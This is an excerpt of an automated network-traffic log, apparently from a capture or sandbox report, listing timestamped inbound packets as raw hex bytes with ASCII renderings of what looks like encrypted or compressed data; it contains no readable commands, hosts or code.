2022-07-08 04:01:38 UTC	168	IN	Data Raw: d7 6d 35 bc 51 5e 2d 9b bd c4 ec 4b fe 9e 87 53 a1 3a 56 0a 5b dc 01 ea c0 e3 3f 8c e2 2c 0d 2f c3 74 a4 94 db 81 dd 31 4a b5 4a c7 54 19 54 10 1a 86 74 f3 25 33 98 64 cf 55 ac a3 0d 7a d0 45 34 62 a8 bf c0 2e 4e 03 5b d0 63 fc 68 71 79 53 c5 e6 d7 e8 e1 4e 69 0e 89 40 20 71 71 36 00 80 bc 2d 7f 91 6b 50 24 ef 67 30 85 34 35 e6 0e ef 03 21 c3 10 a5 ad ec 48 55 2f 05 ea 3b 85 52 15 5c 05 b6 c2 30 5a 9d af 29 15 d7 b0 a0 82 32 5a 43 53 dd 9c 06 16 9f 9e a5 ef ec c0 fd 5f 71 9e b6 72 dc ee 24 cb 76 31 91 ff 42 9f 68 93 ca 4c 5b b8 4b 92 ac 69 e6 a3 8c dd 17 3e 9c af 6a e6 f7 cf b8 b4 f5 23 0c b3 eb 2a c0 4e f7 c9 ca 31 4f e4 a7 91 6f 93 8c d6 e5 b8 9e 4e 89 95 83 48 d3 5d 61 e0 f0 6e 3d c7 24 5f b5 57 1d c1 4e c7 4b 9e 5e 53 80 fc a0 da 42 dc 0c 76 83 8e 3e Data Ascii: m5Q^-KS:V[?,/t1JJTTt%3dUzE4b.N[chqySNi@ qq6-kP$g045!HU/;R\0Z)2ZCS_qr$v1BhL[Ki>j#*N1OoNH]an=$_WNK^SBv>
2022-07-08 04:01:38 UTC	169	IN	Data Raw: e9 a4 92 06 ed 5d 0a e3 e5 13 ff 72 03 e2 cd ec d8 42 14 4e bd 4a 78 e0 fb 97 1c cd 8b 20 8d d1 c5 b4 bd 86 3c 66 30 c8 08 b2 5f a6 f5 92 1e 3a 98 2e 83 9b 13 2d 5f dc ef e9 9a 2e 01 8c 6f 8d 80 89 98 18 76 00 06 0b 8e bd a7 80 aa 15 9d 72 aa 73 87 0b 54 0a 7d d8 b3 9d 22 99 ab 41 4a 93 f3 2a 52 bf a4 b3 c5 20 d5 cf c1 72 08 7e 6e e9 aa 6f cf 90 d9 35 9e 67 b2 96 19 b8 7d cd 8d 39 ce b8 51 8d 63 57 03 2c 9b 13 c1 55 99 85 46 f8 7f 27 97 24 23 0d 42 78 a0 dc c5 e3 a7 3d 91 11 ed 56 ba 55 9a cb 8d 3e cd df 1a ba 85 28 72 7c 22 97 85 ae 2a cf 0d 16 33 a4 f5 36 90 96 2b 0c dd f4 34 d4 2a 78 dd 60 67 14 03 74 2c 7f 6a bb ee 32 12 cd 18 a6 66 a2 dc 8e 24 05 a4 62 34 a8 f7 77 16 57 08 7b 04 55 bb 04 59 4f 35 20 60 ad 1b 0b 05 36 06 95 1d e3 2b bf c3 c2 f8 4e 08 Data Ascii: ]rBNJx <f0_:.-_.ovrsT}"AJR r~no5g}9QcW,UF'$#Bx=VU>(r\|"36+4*x`gt,j2f$b4wW{UYO5 `6+N
2022-07-08 04:01:38 UTC	171	IN	Data Raw: 33 2f fc 03 66 c5 10 7f a5 a5 49 17 3c 51 f4 3a af 50 52 5a 19 9c ca f0 5a df bc e5 0b d6 f6 87 c5 34 ee ad 52 f9 9f 44 10 f7 4a 84 fc ec 87 fc d3 1a 9e a3 64 9e fd 04 d3 77 1b 93 b8 44 d3 0c 93 d2 4f 19 ab 87 8a ad be ec e4 8a 69 9d 38 b8 ac 28 e0 9f 1d 99 a7 f5 64 0a bb ea 2d d5 58 b5 da ea 2b 4e f6 a4 d6 69 d3 8f d1 fd bb dc 5d 3d 7b 82 15 d9 1a 67 4c d5 4f 2e c7 66 59 61 86 3c d2 4e 80 4d b2 3e 53 b7 ea e2 c9 be c7 0d 59 81 c9 3f e6 20 bf 18 99 fe 40 f6 6e 73 18 7a 0c e8 0f 62 f4 bb e1 b7 34 a7 dd 7c df 5e 08 95 68 3e db f4 75 75 53 a3 13 06 98 64 da d5 f7 eb 74 3e d7 51 d1 3e 0c b1 91 94 16 b1 2b ac 0c 35 8c da c9 1c 16 66 51 63 46 da fa b8 75 7b d7 72 b9 c8 06 42 48 60 ea 88 50 f4 ab a8 97 5a cc 7b 5c 21 45 b2 48 71 57 dd 4e 26 d8 16 4d b2 9e de 71 Data Ascii: 3/fI<Q:PRZZ4RDJdwDOi8(d-X+Ni]={gLO.fYa<NM>SY? @nszb4\|^h>uuSdt>Q>+5fQcFu{rBH`PZ{\!EHqWN&Mq
2022-07-08 04:01:38 UTC	172	IN	Data Raw: 4b 6c b9 b9 d9 88 93 c0 2e d9 f1 c6 ba 1c 8d 7f 9d 9e eb 9d ab a3 91 24 c1 a3 93 86 26 c3 05 8a 6b 6b fb 66 3c d0 b2 07 1b 47 4d a2 8c d6 e9 b3 2f 88 0a aa c0 12 0b 86 fe 8f 6e de f9 e6 b8 9c 33 35 ea 0e d6 80 9b 28 9f 1e 54 24 b1 ec 2d d7 00 9b 8f c1 c1 36 84 39 26 1d 62 7e 0f 44 e2 18 c7 6f 8e ec 62 01 b7 cc b2 7f b9 9b 18 9c fb b8 57 36 f8 e4 e1 8c 55 11 60 43 c3 87 93 5c 7a 37 70 73 1f b5 1f 1c 2d 41 03 dd 97 0b 8a c1 92 eb 80 7c c9 97 09 a1 da cf 26 85 56 1c cd ec 57 c2 72 d5 6b 45 6b 82 10 10 c9 54 0f 6d 93 53 80 e4 d0 8e 4f 7d d1 67 43 90 07 0c 71 49 7c 9f fb 7c be fa b4 43 42 5b ce 2d 6c a8 fa ec ce e9 c9 13 39 b6 a0 4c 3c 5a 91 9e a0 9d 80 3b d4 f5 1c fa a3 93 32 44 f2 3c e6 ae 72 a2 d1 91 9d 29 9f 98 bd 7e 4a a9 3c 2e 48 49 79 49 20 fd 4b d5 3d Data Ascii: Kl.$&kkf<GM/n35(T$-69&b~DobW6U`C\z7ps-A\|&VWrkEkTmSO}gCqI\|\|CB[-l9L<Z;2D<r)~J<.HIyI K=
2022-07-08 04:01:38 UTC	173	IN	Data Raw: 8c 4e 88 b6 81 48 d3 5d f1 f8 19 5c 1b c5 36 5f a9 80 1f c1 4e c7 db 9e 94 51 82 e8 b2 da 55 0a 0e 76 83 8e a9 b6 7c aa 2d 9b ae 53 f0 a0 70 a1 5d 4b 7e eb f5 f6 8e e3 e7 25 9d d2 5f 59 5e 4f 03 dc 32 ce c1 77 25 55 86 16 25 8b 64 9d 43 db 3d 76 0b d5 01 c2 66 c2 b2 74 b3 51 27 37 40 18 00 8e 8a d8 6f d8 65 43 60 01 4c 8e 82 77 4e d5 22 aa 46 c8 41 45 48 ad 1e 28 87 bf 9d 95 0a dd d1 92 22 50 9a 0f e7 e3 47 4d 13 da 46 4b 66 9b fd 62 bf fa 0d 4f 3c 9b 64 b4 4f 22 13 f7 b9 23 20 73 df 92 a6 59 23 81 9f 54 c6 2d 83 c2 0d 53 1f df 08 5c 0e e3 89 b6 c5 0b 0a bb 1b b7 1c a8 17 27 87 6c 71 38 f7 08 10 50 3b 47 d5 1b 57 27 fb 40 f7 93 fd b2 11 86 b2 4c ee 7f 39 75 9c 9d 4e a7 47 36 7b 00 06 57 49 26 4b 1a 19 76 86 14 fe 2e 74 d0 b1 a6 39 48 c1 59 86 7c a8 fa 71 Data Ascii: NH]\6_NQUv\|-Sp]K~%_Y^O2w%U%dC=vftQ'7@oeC`LwN"FAEH("PGMFKfbO<dO"# sY#T-S\'lq8P;GW'@L9uNG6{WI&Kv.t9HY\|q
2022-07-08 04:01:38 UTC	174	IN	Data Raw: 32 22 a7 62 34 a8 72 77 74 56 24 62 13 55 48 22 5a 4f 35 20 e5 ad bc 18 29 2f 11 95 2d c5 28 bf c3 c2 7d 4e ae ca a2 0b f1 4c dd c5 83 63 1e 9d 7a bd 55 74 e0 69 15 fd b6 92 34 fc 56 5f fb 95 cb 83 d1 d2 de d9 28 c8 60 76 92 57 9a 53 2c 74 aa f9 2c 28 80 7c 6b 77 59 9e bb 52 da f9 d9 cc b9 5f 88 76 b1 95 4e 6c cc c8 06 b3 a8 82 6b 42 49 e2 d2 96 91 62 d2 86 70 e5 9b 70 f2 47 4c ea 2e aa 9a ed e8 da f9 2f 1b 4a 19 ef b6 34 d4 7e d7 6d b5 bc 42 5d 6a 88 ac c4 59 83 fc 9e 87 53 21 3a 6b 18 46 cb 10 ea 8f 24 3d 8c e2 2c 8d 2f 62 71 03 83 ca 81 20 f2 48 b5 4a c7 d4 19 08 02 98 91 65 f3 97 f1 9a 64 cf 55 2c a3 98 7f 3e 52 25 62 0f b0 c2 2e ce 03 db f0 9e e8 bf 66 68 53 b8 38 d5 e8 e1 4e f9 16 e9 62 d5 73 60 36 2e 5e be 2d 7f 91 fb 58 64 ee 1b 33 97 34 2e 24 0c Data Ascii: 2"b4rwtV$bUH"ZO5 )/-(}NLczUti4V_(`vWS,t,(\|kwYR_vNlkBIbppGL./J4~mB]jYS!:kF$=,/bq HJedU,>R%b.fhS8Nbs`6.^-Xd34.$
2022-07-08 04:01:38 UTC	176	IN	Data Raw: 76 7b d7 72 3c c8 fe 68 70 4a fd 88 d6 58 a8 a8 97 5a 4b 7b 72 25 65 98 5f 71 c3 e5 4c 26 d8 16 dd aa 9f d3 57 bd aa 9b 0e ba 8e 51 b6 1f b4 fd fc bd 16 22 23 49 f1 5e 58 16 83 cf c2 c9 51 ad f7 0f 03 89 5a c5 46 3b e1 d9 20 f5 38 0e 8e 19 e7 8a 0f 01 21 b2 6e 21 ae a6 8d 3c 65 39 17 43 d3 d7 39 ce 42 a7 05 8f 35 12 b3 b0 1c 78 95 63 73 a9 9f 1e 31 d4 78 7f 35 04 07 df 2d 28 05 2c 74 d6 82 4a f9 77 e5 b3 f6 af 65 b0 5f b3 7e f8 6c a4 76 02 c1 44 1d e3 76 13 fc 72 03 e2 48 ec b1 47 38 57 aa 4a 69 e7 f8 97 1c cd 0e 20 b5 d6 38 ad aa 86 0a 61 33 c8 08 b2 da a6 84 92 32 23 8f 2e 7b 9d 10 2d 5f dc 6a e9 7f 20 2d 95 78 8d 56 8d 9b 18 76 00 83 0b 6c bd 8b 99 bd 15 9d 49 a9 73 87 0b d1 0a be c3 9f 84 35 99 f9 7e 49 93 f3 2a d7 bf e6 b0 d8 37 c2 cf 09 4d 0b 7e 6e Data Ascii: v{r<hpJXZK{r%e_qL&WQ"#I^XQZF; 8!n!<e9C9B5xcs1x5-(,tJwe_~lvDvrHG8WJi 8a32#.{-_j -xVvlIs5~I*7M~n
2022-07-08 04:01:38 UTC	177	IN	Data Raw: 80 3b d4 f5 5e d4 a3 93 32 44 b8 e3 e5 ae 72 a2 d1 91 fa 32 9f 98 bd 7e ba 76 3f 2e 48 49 79 49 d9 d2 4b d5 3d 23 3e bb 5d 5f 8a fc 52 78 2c df ab 85 03 b7 9e bc 09 73 c9 40 7c cc 26 3a b9 e0 7c 1b ea 4d 70 36 81 9a 17 45 35 6d 80 48 97 42 fe da 14 ad 93 35 65 11 c9 9d 51 cd 05 ba aa 82 7e 0b 50 75 f4 a8 59 ea 1b cc 53 4d db 88 ff 8a 64 38 c5 71 58 d2 dd e3 1e 6f 5b a9 63 e0 71 30 a0 c4 41 97 18 7d c1 6d 36 18 f9 2e 31 c7 a2 25 a2 0b da 01 71 c5 88 fd a6 a5 49 17 b9 51 0f 10 b0 50 45 5a bf 1d c9 f0 5a df 39 e5 22 d2 85 a2 d2 34 89 a8 50 f9 9f 44 80 ef 44 89 da ee 90 fc aa 9a 9d a3 64 9e 78 04 13 70 04 93 af 44 89 8c 90 d2 4f 19 2e 87 ce 80 5c e4 f3 8a e5 97 3a b8 ac 28 70 87 29 be 81 f7 73 0a e9 6b 2e d5 58 b5 5f ea 6e 61 d1 a5 c1 69 ef 0c d2 fd bb dc d8 Data Ascii: ;^2Dr2~v?.HIyIK=#>]_Rx,s@\|&:\|Mp6E5mHB5eQ~PuYSMd8qXo[cq0A}m6.1%qIQPEZZ9"4PDDdxpDO.\:(p)sk.X_nai
2022-07-08 04:01:38 UTC	178	IN	Data Raw: 13 55 91 02 5a 4f 35 20 e5 ad 92 03 29 2f 11 95 e5 e5 28 bf c3 c2 7d 4e 4a cc a2 0b f1 4c 95 e6 83 63 1e 9d 7a bd 50 52 e0 69 15 fd fe b1 34 fc 56 5f fb 95 52 85 d1 d2 de d9 e3 eb 60 76 92 57 9a 53 27 5b aa f9 2c 28 3a 5f 6b 77 59 9e bb 52 73 fe d9 cc b9 5f f2 55 b1 95 4e 6c cc c8 b6 8b a8 82 6b 42 f7 c2 d2 96 91 62 d2 86 89 e2 9b 70 f2 47 b5 ca 2e aa 9a ed e8 da ab 17 1b 4a 19 ef 0f 14 d4 7e d7 6d b5 bc 19 5a 6a 88 ac c4 10 a2 fc 9e 87 53 21 3a bf 20 46 cb 10 ea 46 05 3d 8c e2 2c 8d 2f b8 77 03 83 ca 81 ee d3 48 b5 4a c7 d4 19 0a 3d 98 91 65 f3 dd d0 9a 64 cf 55 2c a3 5f 79 3e 52 25 62 45 91 c2 2e ce 03 db f0 9b d1 bf 66 68 53 7f 18 d5 e8 e1 4e f9 16 af 67 d5 73 60 36 f4 7e be 2d 7f 91 fb 58 48 d5 1b 33 97 34 77 1b 0c ef 03 21 53 18 75 a5 90 4b 47 2f 25 Data Ascii: UZO5 )/(}NJLczPRi4V_R`vWS'[,(:_kwYRs_UNlkBbpG.J~mZjS!: FF=,/wHJ=edU,_y>R%bE.fhSNgs`6~-XH34w!SuKG/%
2022-07-08 04:01:38 UTC	179	IN	Data Raw: 69 78 a8 a8 97 5a 4b 7b 54 23 65 98 5f 71 80 c6 4c 26 d8 16 dd aa 31 e8 57 bd aa 9b ca 99 8e 51 b6 1f b4 fd 1b b8 16 22 23 49 34 7d 58 16 83 cf c2 c9 cd 99 f7 0f 03 89 18 e6 46 3b e1 d9 20 f5 10 0c 8e 19 e7 8a 40 22 21 b2 6e 21 ae a6 ad 0e 65 39 17 43 12 f7 39 ce 42 a7 05 8f fd 17 b3 b0 1c 78 54 43 73 a9 9f 1e 31 d4 b1 64 35 04 07 df 6a 09 05 2c 74 d6 82 4a 5b 72 e5 b3 f6 af 25 91 5f b3 7e f8 6c a4 0f 19 c1 44 1d e3 b7 32 fc 72 03 e2 48 ec 12 41 38 57 aa 4a b7 c6 f8 97 1c cd 0e 20 a3 cd 38 ad aa 86 49 40 33 c8 08 b2 da a6 78 94 32 23 8f 2e 3d bc 10 2d 5f dc 6a e9 60 06 2d 95 78 8d 93 ad 9b 18 76 00 83 0b f3 bb 8b 99 bd 15 50 69 a9 73 87 0b d1 0a bb ec 9f 84 35 99 b5 59 49 93 f3 2a d7 bf 4d b7 d8 37 c2 cf 4d 6a 0b 7e 6e e9 2f 6f ab b8 f5 2c 89 67 5f 8b 1a Data Ascii: ixZK{T#e_qL&1WQ"#I4}XF; @"!n!e9C9BxTCs1d5j,tJ[r%_~lD2rHA8WJ 8I@3x2#.=-_j`-xvPis5YI*M7Mj~n/o,g_
2022-07-08 04:01:38 UTC	180	IN	Data Raw: e5 ae 72 a2 d1 91 51 3e 9f 98 bd 7e 4d 15 3f 2e 48 49 79 49 d1 d4 4b d5 3d 23 05 d8 5d 5f 8a fc 52 78 71 ed ab 85 03 b7 e1 df 09 73 c9 40 7c cc 3e 3c b9 e0 7c 1b d2 2e 70 36 81 9a 17 45 fd 5f 80 48 97 42 06 ba 14 ad 93 35 65 11 b7 9b 51 cd 05 ba e2 e3 7e 0b 50 75 f4 a8 82 d5 1b cc 53 4d 92 e9 ff 8a 64 38 c5 71 44 d4 dd e3 1e 6f 92 c8 63 e0 71 30 a0 c4 36 a9 18 7d c1 6d fe 79 f9 2e 31 c7 a2 25 a9 0d da 01 71 c5 d0 9c a6 a5 49 17 b9 51 ed 2e b0 50 45 5a e7 7c c9 f0 5a df 39 e5 00 d4 85 a2 d2 34 51 c8 50 f9 9f 44 80 ef e6 b2 da ee 90 fc 72 fa 9d a3 64 9e 78 04 ee 75 04 93 af 44 d1 e3 90 d2 4f 19 2e 87 a0 b4 5c e4 f3 8a b2 f8 3a b8 ac 28 70 87 01 bc 81 f7 73 0a 22 04 2e d5 58 b5 5f ea 4e 53 d1 a5 c1 69 20 63 d2 fd bb dc d8 3d f8 87 7d d1 0d 67 2c b0 4d 2e c7 Data Ascii: rQ>~M?.HIyIK=#]_Rxqs@\|><\|.p6E_HB5eQ~PuSMd8qDocq06}my.1%qIQ.PEZ\|Z94QPDrdxuDO.\:(ps".X_NSi c=}g,M.
2022-07-08 04:01:38 UTC	181	IN	Data Raw: 06 57 49 26 d3 06 19 76 86 14 98 7c 74 d0 b1 a6 39 48 66 5b 86 7c a8 fa 57 e6 06 f4 46 4d 75 39 07 fc 47 01 b2 de f8 e0 47 0d 55 fa dc 18 fc fd a2 1e 9d 98 15 13 d2 0d af fa 10 98 43 33 fd 0a e2 4c f0 fb 92 07 21 df b8 cf f8 15 18 5d 8c fc 9e 5f 25 18 97 28 1b 80 e6 9b 2d 74 50 15 93 5a bd be 9b ed 83 65 f9 a2 46 85 5b 47 b3 73 c8 aa 86 65 0f e3 f8 49 a6 f1 7a 41 65 3a b0 ed 35 92 59 35 21 1b 4b 6c b9 b9 94 2d 90 c0 2e d9 f1 c6 74 1a 8d 7f 9d 9e 25 39 a8 a3 91 24 c1 a3 b3 88 26 c3 05 8a b8 cf f8 66 3c d0 b2 07 cb 41 4d a2 8c d6 bd 18 2c 88 0a aa c0 12 7d 8f fe 8f 6e de a0 4d bb 9c 33 35 ea 0e a6 87 9b 28 9f 1e b6 8f b2 ec 2d d7 00 9b 26 c9 c1 36 84 39 ba b6 61 7e 0f 44 e2 18 19 68 8e ec 62 01 2e 67 b1 7f b9 9b 18 9c 6f b0 57 36 f8 e4 72 20 56 11 60 43 c3 Data Ascii: WI&v\|t9Hf[\|WFMu9GGUC3L!]_%(-tPZeF[GseIzAe:5Y5!Kl-.t%9$&f<AM,}nM35(-&69a~Dhb.goW6r V`C
2022-07-08 04:01:38 UTC	183	IN	Data Raw: b6 16 f6 6d d5 73 f1 36 67 77 85 2f 9e 91 6a 79 2c fb df 31 c0 15 6e 36 ef ef 2d 29 94 1a 3b a4 a8 41 e9 2e b0 38 a3 93 05 17 bb 0d 45 e2 e3 5a 26 af 49 e7 8b b2 59 82 ae 7a 09 52 f8 9e 04 09 8d 4f ac ee 71 d3 91 5d ac 9e aa 44 ea ec c5 1f 8c 1c 9e fd 55 9e e0 ba a9 4d 38 b9 f4 54 21 6b 37 a3 a6 f4 26 3a 91 ad 6d ef 1a 18 89 b5 97 37 3f b1 7a 2d aa 71 17 cb a3 e6 21 c2 65 93 20 92 b2 fd 3a b9 85 4f 53 91 41 4a e2 5c 31 ec dd 4d 17 c6 23 7c b7 83 24 c0 9c cc 98 9c f3 53 4f e1 ab db 87 0a 56 61 90 8e 66 b7 99 b1 c3 9b a7 52 8f 8f 92 a3 04 4a 9a c8 28 f7 ca e0 0e 3a 50 d2 1c 58 c5 63 61 de 5d da 54 64 89 57 fa 15 91 85 77 9d 5c da 0c 59 33 d4 c0 c3 7d d3 a2 77 72 51 05 3e 00 0e b4 8d 99 f3 02 d9 e6 42 cb 12 fe 8d cd 74 d8 f1 5b a9 09 ca e0 63 67 ae d1 29 3c Data Ascii: ms6gw/jy,1n6-);A.8EZ&IYzROq]DUM8T!k7&:m7?z-q!e :OSAJ\1M#\|$SOVafRJ(:PXca]TdWw\Y3}wrQ>Bt[cg)<
2022-07-08 04:01:38 UTC	184	IN	Data Raw: 08 c1 c4 8e b4 98 e4 43 70 97 ca 2e 6a 97 1a ba 3c 34 21 e2 1b 50 30 7f e7 e5 f0 6e 3e 96 d6 33 59 6f 87 b4 81 b4 34 cc 5f 39 01 8a ea 90 25 56 4f 13 58 11 00 55 0c 91 b2 fb a7 3c 6e 37 b5 2d 82 78 1e cf 6e eb 62 2e fa 03 17 5e 5b 79 e7 d7 38 3d 97 db 45 a5 29 30 6c 78 a5 ad cd af 63 cb 9f 03 69 b3 a5 29 bc 8a 2e 26 e5 f0 1f fc e3 70 dc 67 0d 12 70 7c 79 51 e9 b6 c7 3b 60 c9 d4 a2 56 b0 a2 8a 54 02 f4 6b 0d a8 f4 79 4b 55 30 61 06 5b d0 26 61 4b 1e 08 2d a4 74 1f f8 08 33 9c bc c9 6a b3 8a c3 d2 4a 50 e5 c6 00 98 4c 81 d9 92 63 6f 99 eb 9c 29 73 fc 6b 21 f4 6d 95 a7 f8 e4 75 24 94 33 85 e3 f1 9d d9 dc c2 65 57 81 57 95 57 32 76 8e f1 e5 2c d3 79 07 7f f0 9a 0b 4a 3f f3 75 ca 89 58 0c 72 1a 91 a8 7f 74 c9 ce a5 ac 98 55 4a 44 e8 84 98 d2 68 85 86 79 c1 e7 Data Ascii: Cp.j<4!P0n>3Yo4_9%VOXU<n7-xnb.^[y8=E)0lxci).&pgp\|yQ;`VTkyKU0a[&aK-t3jJPLco)sk!mu$3eWWW2v,yJ?uXrtUJDhy
2022-07-08 04:01:38 UTC	185	IN	Data Raw: 77 e1 22 0c 54 51 e6 c1 59 b3 d5 cb 36 5b fd a1 1f 7c 44 30 21 f8 bc fd 5d 3d b6 85 db ff ac 64 69 f6 38 3f 3b 72 7e 7f f5 30 c2 46 5b 4d 99 b3 41 b7 3b e7 dd 9f 18 0c af 86 89 1e a5 8d 37 1b 8d ec 7d f7 3e 72 6a 5a c1 fd fa cb 8c 96 4b a2 7c be e0 50 d5 52 16 94 4f 3f 86 fe 44 73 52 9a d4 27 ba 62 1b c1 5f 5c 4c 38 d0 70 d1 3e 81 b6 73 92 42 b1 36 1e 21 14 5d ce d9 1a 2e 7a 50 60 88 d9 7a 11 67 7b 46 73 98 db 97 49 0c 4e aa a9 e8 41 fb ae 90 7b ce 7b 51 20 13 bf b9 67 62 fd a5 01 63 00 ef aa bb d6 4c be 5e 9b 00 b8 d2 5a 12 1f e9 fa 5a b8 87 20 74 68 81 44 8b 17 29 e9 ff de ff 80 44 19 7d 88 0e de a4 2a 52 ce 12 f5 e7 28 2e 18 1b 8a 51 33 b3 b2 c2 21 50 8c be 11 09 3f 2e 67 3f cc 12 c8 d1 8b 62 8c b8 12 b1 95 86 7d 7e 78 06 b8 a9 06 2e d7 19 6d d7 12 76 Data Ascii: w"TQY6[\|D0!]=di8?;r~0F[MA;7}>rjZK\|PRO?DsR'b_\L8p>sB6!].zP`zg{FsINA{{Q gbcL^ZZ thD)D}*R(.Q3!P?.g?b}~x.mv
2022-07-08 04:01:38 UTC	187	IN	Data Raw: 5d 3e 2c e8 b5 56 86 43 b2 3e 96 43 2a ef 13 00 16 1c b2 7e 6e 88 6c b4 a6 a2 65 15 93 e0 fe 73 33 3c a3 6b c4 86 d8 58 a3 1d 21 72 06 5e 09 35 ec 41 3a c1 ba 2d 5e c7 76 f3 64 86 c9 92 8f b5 c8 ca ca 84 d7 19 81 e7 34 3d 00 c8 bd 6d a1 83 9b 17 ef 56 3b 6c 92 8b 92 e4 89 8f 69 7a 09 4b 0f 97 eb 1b 16 b4 04 9a 95 6d fe d3 2e 68 bc 5e 31 2e 0e 50 ae c0 77 ea 3b 12 5a 9a bb 4f 7d 5e 05 4e 7b b4 ec 3a 45 d4 66 c5 f2 90 a9 43 29 c6 f6 aa bf ac ad b8 7d 2b ad bb fe 7e 7b 57 3a 0f 5b 49 8b 48 d5 f6 eb d4 19 22 45 b5 cf 5f 83 fd 46 6e c3 f5 97 86 8a 91 f0 9f 7f 72 a1 6a 5f cf c2 3c c3 fa 0e 30 fe 68 c6 3f b8 98 28 42 fa 6b c4 61 6e 45 b8 f7 22 a5 22 32 f4 30 79 b3 ad c8 52 9b b0 a5 88 0b 57 54 71 a8 4e c1 76 c3 4a 4c 04 af 19 a6 c0 35 a7 71 fc d0 62 f4 d2 6f 4e Data Ascii: ]>,VC>C*~nles3<kX!r^5A:-^vd4=mV;lizKm.h^1.Pw;ZO}^N{:EfC)}+~{W:[IH"E_Fnrj_<0h?(BkanE""20yRWTqNvJL5qboN
2022-07-08 04:01:38 UTC	188	IN	Data Raw: bd c0 f5 74 b3 53 9a 37 5d 0d 35 8e c9 d8 01 da 47 41 9b 01 9f 8e 4f 76 98 df 37 aa 0b c8 c0 45 0d ad 61 2a 02 ba ab 95 53 de 38 80 23 52 b9 0c f2 e3 ba 4e 0f db 55 5b a9 9b b6 61 fc ea 98 4d 63 8f d2 b6 5a 22 9e f0 38 23 65 73 c8 97 9f 5d 3f 8b 6c 52 4a 2e c4 c2 0e 5b 6a d7 9a 44 18 e9 5a b6 b0 08 6c b3 98 b8 cf a8 fa 2b 69 69 e5 31 85 07 a1 46 7e 47 43 30 46 2a 8b 42 c7 ad 24 a7 82 ad 32 72 d3 69 e7 5a 8c 9f 1c a8 f3 35 7c 0f 2d 57 da 29 1e 07 07 7b f9 14 77 22 47 d0 8c a9 9c 48 96 52 86 7e c5 f5 93 b7 39 fb 7f 4d de 36 33 fe 4f 0c df de d1 bd 7a 0d 35 f5 0b 18 9c f5 d4 1c af 97 69 41 fb 02 e4 fa ad 97 37 31 e3 07 fd 4c 8d a6 c1 07 0a d0 c6 cf 83 1d c7 5f d9 f3 1f 0d 3e 08 cb 29 a6 8f 16 98 33 79 01 15 79 25 bf be ff ed 15 65 52 ab df 87 03 47 0a 21 67 Data Ascii: tS7]5GAOv7EaS8#RNU[aMcZ"8#es]?lRJ.[jDZl+ii1F~GC0FB$2riZ5\|-W){w"GHR~9M63Oz5iA71L_>)3yy%eRG!g
2022-07-08 04:01:38 UTC	189	IN	Data Raw: 5e 77 5b 9e f1 53 68 fb ed ce 34 5e 2a 78 b1 95 be 6d 61 c8 7c a1 91 81 80 42 dd ec 46 97 2a 62 69 86 71 e6 ef 71 8f 47 27 e5 6f a9 b7 ed c6 db 15 3e 03 48 f3 ee 0e 39 e6 7e 3d 6c 91 bd be 48 c3 8a 7f c4 37 9b e6 89 8c 44 f2 2d a1 1c 5d de 3a ea a6 2b 4e 8c 9a 2c 64 2f 38 73 d9 80 6c 80 c0 fe c6 b6 d5 c4 f4 1d 0e 11 93 98 63 f8 0a f2 04 69 bc 47 9f b0 92 68 2e 47 ce 75 5e a7 83 37 99 1a ac ea 40 e7 89 7f 9a 48 e0 2a 4c f5 48 53 d8 0b 4b 7c 2f 6c d5 2b 3f 4c 1d 0e d0 b2 8f 7f d8 d3 23 18 d5 1d 9e 1d cc c6 e1 08 1e 32 dc a7 30 49 db 04 54 38 3d 86 c5 15 87 26 3f cb f6 59 46 af 5d ec d2 b0 a0 83 af 5a dd 59 ff 9f 02 17 24 4d fd cf ee c0 ba 5e 70 9f d0 7d 9c ee 42 1e b9 31 02 f5 46 9f a4 93 81 4e 52 93 86 46 ac 68 b3 a2 30 f7 be 38 fe ad 7f e7 38 0e b9 b4 f5 Data Ascii: ^w[Sh4^xma\|BFbiqqG'o>H9~=lH7D-]:+N,d/8slciGh.Gu^7@H*LHSK\|/l+?L#20IT8=&?YF]ZY$M^p}B1FNRFh088
2022-07-08 04:01:38 UTC	190	IN	Data Raw: 01 52 57 c0 7f 3c 07 52 29 70 29 cd 4e bd 27 d5 a0 bd b1 41 e3 d3 28 2d 36 17 05 9a ad 1e f3 bb 60 30 6e 72 64 ed 26 61 62 4d 10 9f 7a 3e 1e 44 d0 e5 c9 e6 26 df 6e 81 7e 9f 9f d0 e8 51 c6 46 3e 86 4d 57 ab 40 03 a9 bb 95 e4 24 61 20 9f 1a 79 95 88 f7 2e cd dc 49 22 a4 64 c0 94 e7 ea 03 51 fa 08 d3 2c 95 a9 c4 68 74 96 40 bb b0 26 2d 0d b9 9d 8d 44 49 6c a1 1c 8d d4 f9 d0 76 02 36 21 0b 45 fb 8b 9b bf 70 04 36 fe 3a e9 7f 76 3c 21 9e c5 d3 2c f7 97 53 7d 93 a1 4f 20 db 21 dc 99 04 a4 cf 61 3e 40 10 1a d8 8f 6f 37 df 81 6d 8a 2f 87 82 2d 8e 7d fb a7 0e 53 ef e5 d3 14 7a 94 4e ab 55 ec 61 b9 b1 d9 d7 5f 79 e6 1d 2a 12 7b 40 94 98 90 db 0e 1b bc 3d 9d 56 75 18 ef 94 d8 6a 98 e7 1e 85 d1 5c 51 09 62 db ba ae 68 8e 1e 55 9d b0 a8 6c d7 d3 da 25 9a b5 34 93 78 Data Ascii: RW<R)p)N'A(-6`0nrd&abMz>D&n~QF>MW@$a y.I"dQ,ht@&-DIlv6!Ep6:v<!,S}O !a>@o7m/-}SzNUa_y*{@=Vuj\QbhUl%4x
2022-07-08 04:01:38 UTC	192	IN	Data Raw: 9c 67 9b de 0d a3 30 ff db f2 7c 5a 24 12 20 ec ea ac 65 ad 56 39 a4 da ae df 30 7c 0a 1d 54 ae bf e1 0c 37 16 cd 39 e0 35 68 36 81 09 bc 6b 27 91 2a 00 3f 9a 76 31 a5 6c 25 57 56 ef 67 79 c5 7d 82 a4 c3 11 17 48 09 38 79 dc 52 56 03 0d 7e 92 f0 1f 86 af a3 9e d7 f7 f9 82 55 03 8f 30 a0 9f 27 4f ef 29 fc ef 89 99 fc 39 e4 9f c4 3d 9e ac 5e 1f 35 6b 91 bb 1e 9f e1 c8 d2 09 43 b8 c0 1c ac 08 bc a3 e8 87 bf 5b e2 ac 4c bc 87 7f e2 b4 93 79 0a d4 19 2c a3 39 d9 bc 8f b8 10 e4 e5 f0 69 d0 45 d0 b9 da dc 0b 5c b7 c5 29 d3 1a 06 f8 bf 2e 2e a6 07 5f 1b e0 1d a2 2f c7 29 ff 92 37 d6 ea 84 bb be 6c 6d 76 e4 eb 4b e9 c9 df 6c f8 fe 20 93 d6 2d e5 3c 3f 89 eb 9f 87 d4 95 d2 46 cb b5 39 1d 3f 3b f4 dc 4c a9 9b 1f 10 36 cf 50 46 